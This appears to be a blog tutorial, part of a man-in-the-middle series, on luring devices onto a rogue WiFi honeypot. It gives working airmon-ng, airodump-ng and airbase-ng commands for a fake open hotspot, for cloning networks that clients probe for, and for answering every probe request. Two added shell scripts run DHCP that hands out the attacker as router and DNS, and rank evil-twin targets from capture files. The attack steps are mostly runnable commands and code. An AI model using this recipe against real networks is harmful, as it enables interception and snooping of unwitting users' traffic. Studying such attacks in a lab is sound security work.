Man in the Middle 1A: WiFi Honeypots

Man in the middle is a class of attacks in which an attacker inserts themselves into a communication path so that the traffic passes through a resource they control. In this series I'm going to describe how an attacker would hijack, control, subvert and snoop on a victim's network traffic.

In part 1A here I'm going to explain how attackers can place themselves into a man in the middle (MITM) position using a WiFi honeypot. In part 1B I will demonstrate how an ARP cache poisoning attack can be used to reach the same position. In part 2 I will demonstrate what can be done once in the MITM position. You can read either 1A or 1B and go from there; you don't need to read both.
The Plan
What we are trying to do here is get our victim to connect to, and use the Internet through, the attacker's laptop, after which we can do a number of things examined in part two. We will get the victim to connect by setting up a fake access point: first by offering free WiFi, then by impersonating a network the victim already knows, and finally by automatically impersonating whatever access points nearby devices are looking for.

The setup
For these experiments I am using the following setup. Our victim is an EEEPC 900 running BackTrack 5, but it could be any WiFi-enabled device. Our attacker is a MacBook running Blackbuntu, a security Linux distro based on Ubuntu. I will also be using an Alfa wireless adapter. I love this USB WiFi adapter: it runs in monitor mode and it can transmit at 1 Watt.

To do this we need to set up a DHCP server to hand out IP addresses to whoever joins. Some people skip this step, but I want to make it as convenient as possible to connect to our network: a client that joins and gets no address will give up and move on. First you may need to install the DHCP server with:
apt-get install dhcp3-server
Then open up the /etc/default/dhcp file and set at0 as the interface the server listens on (INTERFACES="at0").
at0 is the virtual (tap) interface that airbase-ng creates once it is running; every frame from a client associated to the fake access point comes out of it, so you can think of it as the Ethernet port on the back of a WiFi router. Note that at0 does not exist until airbase-ng has been started, so the DHCP server can only be started after the access point is up. Then open up /etc/dhcp3/dhcpd.conf; I use:
nano /etc/dhcp3/dhcpd.conf
and replace the contents with this (the addresses for our subnet go in the blanks):
ddns-update-style none;
option domain-name-servers ,;
default-lease-time 86400;
max-lease-time 604800;
authoritative;
subnet  netmask  {
  option subnet-mask ;
  option broadcast-address ;
  option routers ;
}
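A working version of this step, added here as an example rather than taken from the post. The addresses are assumptions, since the post's own config does not show its values: at0 is given 10.0.0.1/24, leases run from 10.0.0.10 to 10.0.0.250, and every client is told the attacker is both its router and its DNS server, which is what the later man-in-the-middle steps rely on. Because at0 is created by airbase-ng, run the script with `up` only once the access point from the next section is running; `conf` just prints the generated dhcpd.conf so you can inspect it.

```shell
#!/bin/sh
# honeypot_dhcp.sh: address the airbase-ng tap interface and serve DHCP on it.
# Added example, not from the original post. Assumed values (not on the page):
# tap interface at0, attacker address 10.0.0.1/24, leases 10.0.0.10-10.0.0.250,
# and the attacker itself handed out as DNS server. dhcpd is the ISC daemon that
# the dhcp3-server package (later renamed isc-dhcp-server) installs.

IFACE=${IFACE:-at0}
GATEWAY=${GATEWAY:-10.0.0.1}
NETWORK=${NETWORK:-10.0.0.0}
NETMASK=${NETMASK:-255.255.255.0}
BROADCAST=${BROADCAST:-10.0.0.255}
RANGE_LO=${RANGE_LO:-10.0.0.10}
RANGE_HI=${RANGE_HI:-10.0.0.250}
CONF=${CONF:-/etc/dhcp3/dhcpd.conf}   # /etc/dhcp/dhcpd.conf on the newer package

# Print a complete dhcpd.conf for the honeypot subnet. The router and DNS
# options both point at the attacker so all client traffic lands on at0.
render_dhcpd_conf() {
    cat <<EOF
ddns-update-style none;
authoritative;
default-lease-time 86400;
max-lease-time 604800;
option domain-name-servers $GATEWAY;
subnet $NETWORK netmask $NETMASK {
  range $RANGE_LO $RANGE_HI;
  option subnet-mask $NETMASK;
  option broadcast-address $BROADCAST;
  option routers $GATEWAY;
}
EOF
}

# Bring the honeypot LAN up. at0 only appears once airbase-ng is running, so
# start the fake access point first. Must run as root.
bring_up() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    ip link show "$IFACE" >/dev/null 2>&1 \
        || { echo "$IFACE missing: start airbase-ng first" >&2; return 1; }
    render_dhcpd_conf > "$CONF"
    dhcpd -t -cf "$CONF"                               # syntax-check before starting the daemon
    ifconfig "$IFACE" "$GATEWAY" netmask "$NETMASK" up # give at0 the router address
    dhcpd -cf "$CONF" "$IFACE"                         # serve leases on the tap interface only
}

# Usage: sh honeypot_dhcp.sh conf   (print the config)
#        sudo sh honeypot_dhcp.sh up (configure at0 and start dhcpd)
case "${1-}" in
    conf) render_dhcpd_conf ;;
    up)   bring_up ;;
esac
```

`dhcpd -t -cf` is worth keeping: a dhcpd.conf with a stray or missing brace makes the daemon exit silently under some init scripts, and the symptom at the victim is simply "connected, no IP".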
Creating a honeypot access point
To set up the fake WiFi router we will use airbase-ng, and airodump-ng to take a look at the WiFi activity around us, but first we need to put the Alfa wireless adapter into monitor mode with:

sudo airmon-ng start wlan0

Then to take a look we do:

sudo airodump-ng mon0

This will show you the access points (top table) and the client devices (bottom table) in your area, including, in the Probes column, the network names each client is asking for.

CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:f0:3C:2D:1B:R9   11  16       10        0    0  11  54.  OPN              NETGEAR                         
 00:14:6C:7A:41:81   34 100       57       14    1   9  11e  WEP  WEP         NETGEAR
 00:14:6C:7E:40:80   32 100      752       73    2   9  54   WPA  TKIP   PSK  LINKSYS                            
 BSSID              STATION            PWR   Rate   Lost  Packets  Probes
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51   36-24    2       14
 (not associated)   00:14:A4:3F:8D:13   19    0-0     0        4    AirportWireless
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1   36-36    0        5    Hilton Wifi
 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35   54-54    0       99    MyCoWifi

Now we can run airbase-ng to create a tempting free WiFi hotspot, "FreeWifi", with:

sudo airbase-ng -a aa:bb:cc:dd:ee:ff -e FreeWifi mon0
Here sudo runs the command as root, -a specifies the BSSID (MAC address) the fake access point will advertise, -e specifies the ESSID (the network name), in this case FreeWifi, and mon0 is the monitor mode interface of the Alfa WiFi card.

From here potential victims can connect to the tempting free wireless network, but we can also target a specific host. Looking at the output from airodump-ng, we can see a station probing for AirportWireless, so we just change the ESSID in our command:

sudo airbase-ng -a aa:bb:cc:dd:ee:ff -e AirportWireless mon0

and a device that remembers AirportWireless as an open network happily connects.
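Picking the target by eye works for one screen of output; with a busy airodump-ng capture it helps to automate it. The script below is an added example, not part of the original post. It reads the CSV file that `airodump-ng -w <prefix> mon0` writes (`<prefix>-01.csv`) instead of the screen table, because the CSV columns are stable, and for every ESSID a client is probing for it reports how many stations want it and whether the real network is in range and what encryption it advertises. That last check matters because, as the wrap-up below explains, a client that expects WEP/WPA will not finish joining an open clone. The sample data is constructed to mirror the table above, with one extra LINKSYS probe added to exercise the encrypted case.

```shell
#!/bin/sh
# probe_targets.sh: choose evil-twin targets from an airodump-ng capture.
# Added example, not from the original post. Assumes the CSV layout written by
# `airodump-ng -w <prefix> mon0` (<prefix>-01.csv):
#   AP rows:      BSSID, First time seen, Last time seen, channel, Speed,
#                 Privacy, Cipher, Authentication, Power, # beacons, # IV,
#                 LAN IP, ID-length, ESSID, Key
#   Station rows: Station MAC, First time seen, Last time seen, Power,
#                 # packets, BSSID, Probed ESSIDs (one ESSID per extra field)
# ESSIDs containing a comma are not handled (the CSV cannot represent them).

# For every ESSID some station is probing for, print
#   ESSID <TAB> number of probing stations <TAB> verdict
# A probed network that is not in range, or is open, can be cloned with a plain
# `airbase-ng -e ESSID`; one that is in range with WEP/WPA privacy will not
# accept an open clone.
pick_targets() {
    awk -F', *' '
        /^BSSID, First time seen/ { sect = "ap";  next }
        /^Station MAC/            { sect = "sta"; next }
        sect == "ap" && $1 ~ /:/ && NF >= 14 {
            e = $14; gsub(/ +$/, "", e)
            if (e != "") priv[e] = $6
        }
        sect == "sta" && $1 ~ /:/ {
            for (i = 7; i <= NF; i++) {
                p = $i; gsub(/ +$/, "", p)
                if (p == "") continue
                if (!(p in want)) order[++n] = p
                want[p]++
            }
        }
        END {
            for (i = 1; i <= n; i++) {
                p = order[i]
                if (!(p in priv))
                    v = "not in range: clone it as an open AP"
                else if (priv[p] == "OPN")
                    v = "open: clone it as an open AP"
                else
                    v = "encrypted (" priv[p] "): an open clone will not authenticate"
                printf "%s\t%d\t%s\n", p, want[p], v
            }
        }' "$1"
}

# Constructed sample in the airodump-ng CSV layout, mirroring the screen table
# in the post (first BSSID made valid); the LINKSYS probe from the unassociated
# station is added to exercise the encrypted-network verdict.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:F0:3C:2D:1B:09, 2007-04-26 17:40:01, 2007-04-26 17:41:30, 11,  54, OPN,  ,  , -11,  10,   0,   0.  0.  0.  0,   7, NETGEAR,
00:14:6C:7A:41:81, 2007-04-26 17:40:01, 2007-04-26 17:41:30,  9,  11, WEP, WEP,  , -34,  57,  14,   0.  0.  0.  0,   7, NETGEAR,
00:14:6C:7E:40:80, 2007-04-26 17:40:01, 2007-04-26 17:41:30,  9,  54, WPA, TKIP, PSK, -32, 752,  73,   0.  0.  0.  0,   7, LINKSYS,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:32:31:31, 2007-04-26 17:40:05, 2007-04-26 17:41:25, -51,  14, 00:14:6C:7A:41:81,
00:14:A4:3F:8D:13, 2007-04-26 17:40:30, 2007-04-26 17:41:20, -19,   4, (not associated) ,AirportWireless,LINKSYS
00:0C:41:52:D1:D1, 2007-04-26 17:40:10, 2007-04-26 17:41:00,  -1,   5, 00:14:6C:7A:41:81,Hilton Wifi
00:0F:B5:FD:FB:C2, 2007-04-26 17:40:02, 2007-04-26 17:41:29, -35,  99, 00:14:6C:7E:40:80,MyCoWifi,AirportWireless
EOF
}

# Usage: sh probe_targets.sh <prefix>-01.csv   (no argument: run on the sample)
case "${1-}" in
    "") f=$(mktemp); sample_csv > "$f"; pick_targets "$f"; rm -f "$f" ;;
    *)  pick_targets "$1" ;;
esac
```

On the sample the first line is AirportWireless with two probing stations and no real AP in range, which is exactly the target chosen by hand above; LINKSYS comes out flagged as WPA, so cloning it as an open network would only produce failed associations.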

Quick bit of theory. A wireless access point advertises itself by sending out what are known as beacon frames. These frames are broadcast to anyone who cares to listen, advertising the access point and its ESSID.
On the other side, if a host like your smartphone or your laptop has connected to an access point before, it may look for that access point by broadcasting probe request frames naming its favourite networks. When an access point answers with a probe response, the device generally tries to connect.

So what stops us from answering every probe request, claiming to be whichever access point is being looked for? What's more, we can keep sending out beacon frames for that network after we have seen the probe request:
sudo airbase-ng -P -C 30 -v mon0
-P tells airbase-ng to respond to all probe requests: whenever a device probes for any ESSID, airbase-ng replies claiming to be that access point. -C 30 tells airbase-ng that once it has seen a probe request for an ESSID it should also broadcast beacons for that ESSID for 30 seconds, and -v makes it print what it is doing. If you look at the available wireless networks on a smartphone, for example, you should see a myriad of access points appearing; they are all actually your fake airbase-ng access point. One caveat: this trick depends on devices sending directed probe requests for the networks they remember, and current operating systems have largely stopped doing that for ordinary saved networks, so expect it to work far less often on modern devices than it did when this post was written.

Wrapping up
In this situation victims can only join if they expect an open network: a client that remembers the network as WEP/WPA/WPA2 will fail to authenticate against our open clone. I will show in another post how it is possible to get the key from the host. At the moment our victims can connect to our attacker, but they are not connected to the Internet through it. We will cover that in part 2.